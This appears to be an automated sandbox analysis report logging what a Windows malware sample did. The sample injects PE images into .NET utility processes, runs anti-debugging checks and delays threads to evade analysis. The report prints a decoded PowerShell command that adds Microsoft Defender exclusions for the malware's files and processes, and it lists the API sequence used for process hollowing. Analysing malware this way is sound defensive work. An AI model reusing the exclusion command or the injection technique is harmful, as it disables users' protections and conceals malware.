Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_0041B6EA FindFirstFileExW,

5_2_0041B6EA

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59875
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59766
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59656
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59547
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59438
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59328
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59219
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59094
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 58985
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 58860
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 58735
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 58610
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 58485
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\l6E.exe	Thread delayed: delay time: 922337203685477

Source: AddInProcess.exe, 0000000D.00000002.378432123906.000001FB3983F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW{
Source: AddInProcess.exe, 0000000D.00000002.378432123906.000001FB3983F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: glmIOFfdMi.exe, 00000006.00000002.378478168253.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.378696258925.00000245E4E57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_00407B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_00407B01

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041914C mov eax, dword ptr fs:[00000030h]		5_2_0041914C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004114A6 mov ecx, dword ptr fs:[00000030h]		5_2_004114A6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_0041EFD8 GetProcessHeap,

5_2_0041EFD8

Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00407B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00407B01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00407C63 SetUnhandledExceptionFilter,	5_2_00407C63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00407D75 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00407D75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040DD78 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_0040DD78

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Bypasses PowerShell execution policy

Source: unknown

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe

Code function: 0_2_029C2165 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_029C2165

Encrypted powershell cmdline option found

Source: unknown

Process created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\Dylane\AppData\Roaming\ArgumentCount\Current.exe,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe,C:\Users\Dylane\AppData\Local\Temp\ -Force; Add-MpPreference -ExclusionProcess C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe,C:\Users\Dylane\AppData\Roaming\ArgumentCount\Current.exe

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Thread register set: target process: 8344
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread register set: target process: 8596

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 434000	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 436000	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 53F000	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DE9008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 4B4000
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 644EC4F010
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: C24F29B010
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 445000
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 448000
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 458000
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E28008

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe "C:\Users\user\AppData\Roaming\glmIOFfdMi.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe "C:\Users\user\AppData\Roaming\YZRVUYjilL.exe"	Jump to behavior
